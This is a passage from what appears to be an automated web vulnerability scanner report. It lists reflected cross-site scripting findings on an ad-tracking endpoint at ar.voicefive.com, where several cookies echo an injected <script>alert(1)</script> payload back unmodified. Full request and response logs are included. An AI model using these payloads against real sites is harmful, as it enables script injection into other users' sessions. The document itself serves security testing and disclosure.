Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; BMX_BR=pid=p84532700&prad=47146&arc=34917&exp=1297559105; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; ar_p84053757=exp=1&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:17:53 2011&prad=1160023&arc=1420279&; BMX_G=method->-1,ts->1297606673; BMX_3PC=18545a<script>alert(1)</script>a64660bacfd; ar_s_p84053757=1->1297606675; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Feb 2011 14:24:40 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84053757=exp=2&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:24:40 2011&prad=1160022&arc=1420280&; expires=Sat 14-May-2011 14:24:40 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27610

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1160022",Pid:"p84053757",Arc:"1420280",Location:COMS
...[SNIP]...
757": '1->1297606675', "UID": '1d29d89e-72.246.30.75-1294456810', "ar_p85001580": 'exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&', "BMX_3PC": '18545a<script>alert(1)</script>a64660bacfd', "BMX_BR": 'pid=p84532700&prad=47146&arc=34917&exp=1297559105', "ar_p86183782": 'exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&', "ar_p45555483"
...[SNIP]...

2.96. http://ar.voicefive.com/bmx3/broker.pli [BMX_BR cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_BR cookie is copied into the HTML document as plain text between tags. The payload 1ca26<script>alert(1)</script>97822c3901f was submitted in the BMX_BR cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84053757&PRAd=1160022&AR_C=1422863 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; BMX_BR=pid=p84532700&prad=47146&arc=34917&exp=12975591051ca26<script>alert(1)</script>97822c3901f; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Feb 2011 14:17:56 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84053757=exp=1&initExp=Sun Feb 13 14:17:56 2011&recExp=Sun Feb 13 14:17:56 2011&prad=1160022&arc=1422863&; expires=Sat 14-May-2011 14:17:56 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297606676; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27401

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1160022",Pid:"p84053757",Arc:"1422863",Location:COMS
...[SNIP]...
n=4&arc=38899481&', "ar_p85001580": 'exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&', "BMX_BR": 'pid=p84532700&prad=47146&arc=34917&exp=12975591051ca26<script>alert(1)</script>97822c3901f', "ar_p86183782": 'exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&', "ar_p84532700": 'exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:
...[SNIP]...

2.97. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload e83e8<script>alert(1)</script>ee18e5371e6 was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84053757&PRAd=1160022&AR_C=1420280 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; BMX_BR=pid=p84532700&prad=47146&arc=34917&exp=1297559105; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; ar_p84053757=exp=1&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:17:53 2011&prad=1160023&arc=1420279&; BMX_G=method->-1,ts->1297606673e83e8<script>alert(1)</script>ee18e5371e6; BMX_3PC=1; ar_s_p84053757=1->1297606675; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Feb 2011 14:24:40 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84053757=exp=2&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:24:40 2011&prad=1160022&arc=1420280&; expires=Sat 14-May-2011 14:24:40 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27610

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1160022",Pid:"p84053757",Arc:"1420280",Location:COMS
...[SNIP]...
Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&', "BMX_3PC": '1', "BMX_BR": 'pid=p84532700&prad=47146&arc=34917&exp=1297559105', "BMX_G": 'method->-1,ts->1297606673e83e8<script>alert(1)</script>ee18e5371e6', "ar_p86183782": 'exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&', "ar_p84532700": 'exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:
...[SNIP]...

2.98. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 44e5b<script>alert(1)</script>1db2f778374 was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84053757&PRAd=1160022&AR_C=1422863 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; BMX_BR=pid=p84532700&prad=47146&arc=34917&exp=1297559105; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; UID=1d29d89e-72.246.30.75-129445681044e5b<script>alert(1)</script>1db2f778374

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Feb 2011 14:17:56 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84053757=exp=1&initExp=Sun Feb 13 14:17:56 2011&recExp=Sun Feb 13 14:17:56 2011&prad=1160022&arc=1422863&; expires=Sat 14-May-2011 14:17:56 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297606676; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27401

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1160022",Pid:"p84053757",Arc:"1422863",Location:COMS
...[SNIP]...
);
}else{if(window.attachEvent){return window.attachEvent("onload",C.OnReady.onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "UID": '1d29d89e-72.246.30.75-129445681044e5b<script>alert(1)</script>1db2f778374', "ar_p67161473": 'exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "ar_p85001580": 'exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb
...[SNIP]...

2.99. http://ar.voicefive.com/bmx3/broker.pli [ar_da39f516a098b3de) ar_p68511049 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_da39f516a098b3de&#41; ar_p68511049 cookie is copied into the HTML document as plain text between tags. The payload 41611<script>alert(1)</script>bc2ac2cbbe3 was submitted in the ar_da39f516a098b3de&#41; ar_p68511049 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84053757&PRAd=1160022&AR_C=1422863 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&41611<script>alert(1)</script>bc2ac2cbbe3; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; BMX_BR=pid=p84532700&prad=47146&arc=34917&exp=1297559105; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Feb 2011 14:17:55 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84053757=exp=1&initExp=Sun Feb 13 14:17:55 2011&recExp=Sun Feb 13 14:17:55 2011&prad=1160022&arc=1422863&; expires=Sat 14-May-2011 14:17:55 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297606675; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27401

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1160022",Pid:"p84053757",Arc:"1422863",Location:COMS
...[SNIP]...
ecExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&', "ar_p68511049": 'exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&41611<script>alert(1)</script>bc2ac2cbbe3' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http
...[SNIP]...

2.100. http://ar.voicefive.com/bmx3/broker.pli [ar_p45555483 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p45555483 cookie is copied into the HTML document as plain text between tags. The payload 3ee78<script>alert(1)</script>334dd945f0f was submitted in the ar_p45555483 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84053757&PRAd=1160022&AR_C=1422863 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&3ee78<script>alert(1)</script>334dd945f0f; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; BMX_BR=pid=p84532700&prad=47146&arc=34917&exp=1297559105; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Feb 2011 14:17:55 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84053757=exp=1&initExp=Sun Feb 13 14:17:55 2011&recExp=Sun Feb 13 14:17:55 2011&prad=1160022&arc=1422863&; expires=Sat 14-May-2011 14:17:55 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297606675; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27401

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1160022",Pid:"p84053757",Arc:"1422863",Location:COMS
...[SNIP]...
Exp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&3ee78<script>alert(1)</script>334dd945f0f', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&', "ar_p84068139": 'exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:0
...[SNIP]...

2.101. http://ar.voicefive.com/bmx3/broker.pli [ar_p67161473 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p67161473 cookie is copied into the HTML document as plain text between tags. The payload c7355<script>alert(1)</script>d13449392db was submitted in the ar_p67161473 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84053757&PRAd=1160022&AR_C=1422863 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&c7355<script>alert(1)</script>d13449392db; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; BMX_BR=pid=p84532700&prad=47146&arc=34917&exp=1297559105; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Feb 2011 14:17:54 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84053757=exp=1&initExp=Sun Feb 13 14:17:54 2011&recExp=Sun Feb 13 14:17:54 2011&prad=1160022&arc=1422863&; expires=Sat 14-May-2011 14:17:54 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297606674; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27401

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1160022",Pid:"p84053757",Arc:"1422863",Location:COMS
...[SNIP]...
oad);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "ar_p67161473": 'exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&c7355<script>alert(1)</script>d13449392db', "ar_p84532700": 'exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&', "UID": '1d29d89e-72.246.30.75-1294456810', "ar_p85001580": 'exp=52&initExp=Wed Jan
...[SNIP]...

2.102. http://ar.voicefive.com/bmx3/broker.pli [ar_p83612734 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p83612734 cookie is copied into the HTML document as plain text between tags. The payload 43c30<script>alert(1)</script>8e3472c0de8 was submitted in the ar_p83612734 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84053757&PRAd=1160022&AR_C=1422863 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
